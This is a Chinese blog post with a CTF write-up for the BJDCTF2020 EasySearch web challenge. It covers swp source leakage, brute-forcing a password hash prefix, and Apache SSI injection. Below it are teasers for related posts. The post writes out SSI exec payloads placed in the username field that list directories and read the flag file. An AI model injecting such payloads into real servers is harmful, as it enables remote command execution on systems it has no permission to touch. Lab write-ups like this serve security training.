[BJDCTF2020]EasySearch Writeup

最新推荐文章于 2023-09-30 09:54:45 发布
最新推荐文章于 2023-09-30 09:54:45 发布
阅读量262 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/StevenOnesir/article/details/111938215
版权

今年BJD CTF的原题,主要考察Apache SSI远程命令执行漏洞

在这里插入图片描述
进入题目后是这样

我们扫描目录可以发现swp源码泄露

审计源码:

在这里插入图片描述
逻辑非常简单,扫一眼就能看完。实际上我们对于username是完全可控的,password用于绕过登陆,只要让hash值得前6位于源码中的值相等就行,此处可以直接爆破。

爆破过程非常简单,就不多说了。我们选取一个很吉利的密码:2020666

然后我们成功登陆:

在这里插入图片描述
查看返回包:

在这里插入图片描述
访问这个url:
在这里插入图片描述
可以看到回显了用户名

这里我们可以根据SSI注入直接构建payload:

<!--#exec cmd="ls"-->

回显:
在这里插入图片描述
访问可以看到:
在这里插入图片描述
说明命令被成功执行

但当前目录没有flag,所以我们回退一下:

payload:

<!--#exec cmd="cd ../;ls"-->

回显:
在这里插入图片描述
直接cat falg就好了:

<!--#exec cmd="cd ../;cat flag_990c66bf85a09c664f0b6741840499b2"-->

回显:
在这里插入图片描述

结束

考察知识点:

SSI远程命令执行漏洞

难度:

简单

总结:

看淡离合,止于自心。

StevenOnesir
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]EasySearch
夜幕下的灯火阑珊的博客
05-13 1763
知识点 ApacheSSI远程命令执行漏洞 扫描到后台后swp文件泄露,访问一下得到源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
BDJCTF-2020-Web-easy_search
feng的博客
11-05 416
WP 进入环境,看到是个登录页面,第一反应是SQL注入。。。然后我就在SQL注入的路上一去不复返了。 感觉自己就是做题思路不是很开阔,知识点学的差是一个方面,思维的发散性又是一个方面。这题关键的信息在index.php.swp,考虑到自己SQL注入不行,应该去转换思路,去尝试其他的方向,比如备份文件这样的。 不过这题似乎直接扫目录就可以扫到index.php.swp,不过我dirsearch没扫到,还是自己字典的问题,要慢慢增加自己字典的容量。 然后就是代码审计: <?php ob_start();
SSI注入 + [BJDCTF2020]EasySearch writeup
ShenZ的博客
09-08 276
SSI注入 全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。 页面中有一小部分是动态输出的时候使用SSI,比如: 文件相关的属性字段 当前时间 访客IP 调用CGI程序 SSI语法 SHTML文件中使用SSI指令引用其他的html文件(#include),此时服务器会将SHTML中包含的SSI指令解释,再传送给客户端,此时的HTML中就不再有SSI指令了。 ①显示
[BJDCTF2020]EasySearch(ssi漏洞)
Yang_99的博客
09-26 381
1.首页御剑扫描可以发现有index.php.swp,可以查看源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[
buuctf-EasySearch
m0_62094846的博客
05-14 275
特意搜了下题目,以为有什么提示,结果是一个搜索插件 然后用注入,爆破密码,都没用 扫描后台发现index.php.swp备份(我用御剑没扫出来,下次要安装一些其他的扫描工具,用dirmap指定字典才出来。网上的字典大部分没包含index.php.swp的,还要自己添加到字典里。) <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0..
WMCTF_2020官方WriteUp 高清PDF版
10-15
WMCTF_2020官方WriteUp.pdf WMCTF_2020官方WriteUp 高清PDF版
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
ctfhub web全部做题记录(持续跟新)
01-08
信息泄露 目录历遍 直接找就行。。。 PHPINFO 进去直接 ctrl+f 搜flag就行。。。 备份文件下载 网站源码 提示一些相关的名字 可以写个简单的脚本爆破一下 当然也可以 dirsearch 直接扫 import requests url = http://challenge-c93f188d4781b829.sandbox.ctfhub.com:10080/ a = ['web','website','backup','back','www','wwwroot','temp'] b = ['tar','tar.gz','zip','rar'] for i in a: fo
第六十题——[BJDCTF2020]EasySearch
分享简单的安全技术
05-08 220
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,叫我们输入用户名与密码,使用dirsearch扫描出来index.php.swp目录,下载下来是源码 <?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt
CTFhub信息泄露漏洞实验指导手册
最新发布
weixin_43401651的博客
09-30 568
环境:Windows2008、Kali Linux靶场:CTFhub-信息泄露工具:浏览器:火狐浏览器抓包改包工具:burpsuite信息泄露漏洞利用工具:dirsearch、GitHack、dvcs-ripper、Nmap。
CTFHUB技能树(全详细解析含进阶)
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
CTFHUB-WEB-信息泄露
weixin_43486981的博客
08-13 945
CTFHUB-WEB-信息泄露目录遍历:PHPINFO备份文件下载备份文件下载-网站源码Dirsearch目录爆破工具备份文件下载-bak文件备份文件下载-vim缓存备份文件下载-.DS_StoreSVN泄露工具:dvcs-ripper信息泄露利用工具Git泄露Git泄露-LogHithack:.git泄露利用工具,可还原历史版本Git泄露-stashGit泄露-index 目录遍历: 靶机环境 点进去是4个文件夹,开始寻找flag 发现flag在2/3文件夹里,打开即可获得flag 别人博客里的代
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 7万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转
CTFhub备份文件下载四题做题方法
qq_65083200的博客
04-18 548
目录 网站源码 back文件 vim缓存 .DS_Store 网站源码 做网站源码首先下载Burp Suite软件,用于文件抓包|;百度搜索“burp”即可下载。 下载安装好了Burp Suite软件后,开始解题: 1、打开CTFhub备份文件下的网站源码开启环境,点击进入题目 2、打开Burp Suite在proxy下intercept 窗口点击intercept is on 再点击opep browser,在打开的网页中输入题目的网址,回车可以看到窗口的变化,“..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值